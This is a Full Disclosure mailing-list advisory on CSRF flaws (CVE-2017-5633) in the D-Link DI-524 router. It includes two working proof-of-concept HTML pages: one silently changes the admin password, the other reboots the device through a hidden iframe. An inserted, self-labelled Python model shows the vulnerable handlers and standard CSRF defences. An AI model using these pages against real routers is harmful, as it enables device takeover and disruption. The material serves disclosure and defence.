Message-ID: <CAETDBSCJZoPGdTMkNAM5E2TomafwiG=e8v_T_pmfV7kjAYKycg@mail.gmail.com>
Date: Mon, 27 Feb 2017 19:20:49 -0300
From: Felipe Soares de Souza <fsouza.researcher@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities
Title:
====
D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities
Credit:
======
Name: Felipe de Souza
Date:
=====
27-02-2017
Reference:
=====
CVE-2017-5633
Vendor:
======
D-Link is the global leader in connectivity for small, medium and large
enterprise business networking.
Product:
=======
D-Link DI-524 wireless router
Product link: https://dlink.com.br/produto/di-524150
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerabilities in the D-LINK DI-524
wireless router enable an attacker to [1] reboot the device, [2] change
the admin password, and [3] possibly cause other unspecified impacts, via
crafted requests.
Affected Version:
=============
9.01
Exploitation-Technique:
===================
Remote
Details:
=======
An attacker who lures an authenticated D-Link DI-524 user into browsing a
malicious website or clicking a crafted URL can exploit cross-site request
forgery (CSRF). The attacker could change the admin password or reboot
the device.
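The requests in the two PoC pages succeed because the router's CGI handlers act on any request that arrives with the user's credentials, regardless of where the page that issued it came from, and because the reboot action is reachable with a plain GET. The following is an added example, not firmware code and not part of this advisory: a hypothetical Python model of the two handlers that reproduces the vulnerable behaviour with protect=False and, with protect=True, applies the standard CSRF defences (state changes only over POST, an Origin/Referer check against the device's own origin, and a per-session anti-CSRF token). The endpoint paths and parameter names are taken from the PoC forms; the session-cookie mechanism, the placeholder origin http://evil.example and the interpretation of p1 as a confirmation field are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Origin of the device's admin interface, as used in the advisory's PoC pages.
DEVICE_ORIGIN = "http://192.168.0.1"


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    params: dict      # query string or form body, already parsed
    cookies: dict


@dataclass
class Session:
    session_id: str
    # Per-session anti-CSRF token; a page on another origin cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


class RouterAdmin:
    """Hypothetical model of the admin CGI handlers (not DI-524 firmware code).

    protect=False: any request carrying a valid session cookie is acted on.
    protect=True: state changes require POST, the Origin/Referer must be the
    device itself, and the form must echo the session's anti-CSRF token.
    """

    def __init__(self, protect: bool):
        self.protect = protect
        self.admin_password = "admin"   # constructed starting value
        self.rebooted = False
        self.sessions: dict[str, Session] = {}

    def login(self) -> Session:
        s = Session(secrets.token_hex(8))
        self.sessions[s.session_id] = s
        return s

    def _csrf_ok(self, req: Request, session: Session) -> bool:
        src = req.headers.get("Origin") or req.headers.get("Referer")
        if not src:
            return False                      # fail closed when neither header is present
        u = urlparse(src)
        if f"{u.scheme}://{u.netloc}" != DEVICE_ORIGIN:
            return False
        return hmac.compare_digest(req.params.get("csrf_token", ""), session.csrf_token)

    def handle(self, req: Request) -> tuple[int, str]:
        session = self.sessions.get(req.cookies.get("sid", ""))
        if session is None:
            return 401, "not logged in"
        if self.protect:
            if req.method != "POST":
                return 405, "state-changing actions require POST"
            if not self._csrf_ok(req, session):
                return 403, "csrf check failed"
        if req.path == "/cgi-bin/pass":
            # Pa/p1 are the PoC's field names; p1 treated as confirmation (assumption).
            if req.params.get("Pa") != req.params.get("p1"):
                return 400, "password confirmation mismatch"
            self.admin_password = req.params["Pa"]
            return 200, "password changed"
        if req.path == "/cgi-bin/dial":
            # The PoC's dial?... URL reboots the device; the advisory does not
            # document what the individual parameters mean.
            self.rebooted = True
            return 200, "rebooting"
        return 404, "unknown action"


# Constructed requests: what a logged-in user's browser would send after
# loading the attacker's pages. "http://evil.example" is a placeholder origin.

def poc_password_change(sid: str) -> Request:
    return Request("POST", "/cgi-bin/pass", {"Origin": "http://evil.example"},
                   {"rc": "@atbox", "Pa": "ATTACKER", "p1": "ATTACKER"}, {"sid": sid})


def poc_reboot(sid: str) -> Request:
    return Request("GET", "/cgi-bin/dial", {"Referer": "http://evil.example/"},
                   {"rc": "@", "A": "H", "M": "0", "T": "2000", "rd": "status"}, {"sid": sid})


def legit_password_change(session: Session, new_pw: str) -> Request:
    # A form served by the device itself: same origin, session token embedded.
    return Request("POST", "/cgi-bin/pass", {"Origin": DEVICE_ORIGIN},
                   {"Pa": new_pw, "p1": new_pw, "csrf_token": session.csrf_token},
                   {"sid": session.session_id})


if __name__ == "__main__":
    for protect in (False, True):
        dev = RouterAdmin(protect)
        s = dev.login()
        print("protected" if protect else "vulnerable",
              dev.handle(poc_password_change(s.session_id)),
              dev.handle(poc_reboot(s.session_id)),
              "password now:", dev.admin_password)
```

Run as a script, the vulnerable model ends with the password set to ATTACKER and the device rebooted; the protected model answers 403 to the forged POST and 405 to the iframe GET while still accepting the device's own form. The Origin check alone would be bypassed by a browser that omits both headers, which is why the token check is kept as well and the absence of both headers is treated as a failure.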
Proof Of Concept:
================
[1] The user logs in to the DI-524 wireless router.
[2] The user visits the attacker's malicious web page or clicks a crafted
link (exploit01.html | exploit02.html).
[3] exploit01.html changes the admin password; exploit02.html causes a
device reboot.
Exploit (exploit01.html):
<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.0.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="ATTACKER">
<input type="hidden" name="p1" value="ATTACKER">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
Exploit (exploit02.html):
<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>
Credits:
=======
Felipe de Souza - Network Analyst & Programmer
twitter: https://twitter.com/felipes01
Linkedin: https://br.linkedin.com/in/felipe-soares-de-souza-a4332b33
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure